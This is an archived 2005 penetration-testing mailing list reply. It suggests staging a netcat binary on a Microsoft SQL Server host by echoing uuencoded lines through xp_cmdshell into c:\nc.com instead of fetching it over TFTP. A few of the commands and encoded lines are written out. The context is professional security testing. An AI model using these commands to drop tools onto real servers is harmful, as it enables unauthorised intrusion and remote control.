Penetration Testing mailing list archives
Re: TFTP and XP_CMDSHELL - Weird
From: Javier Fernandez-Sanguino <jfernandez () germinus com>
Date: Thu, 23 Jun 2005 19:24:02 +0200
Andres Molinetti wrote:
I think the problem is the tftp client. Does anyone know if MS has fixed it in anyway not to allow downloads from low-privileged users?? or something like that??
Why use tftp? You can just create an uuencode file that will auto-decode itself when run. Try using
xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'xp_cmdshell 'echo M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U >>c:\nc.com' xp_cmdshell 'echo M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
(...)and so on. I'll leave the rest up to you. There are some caveats when you want to pull that through HTTP but it works everytime.
Regards Javier
Current thread:
- TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 22)
- Re: TFTP and XP_CMDSHELL - Weird Jose Selvi (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Frederic Charpentier (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Javier Fernandez-Sanguino (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird - SOLVED Andres Molinetti (Jun 24)
- Re: TFTP and XP_CMDSHELL - Weird Jose Selvi (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)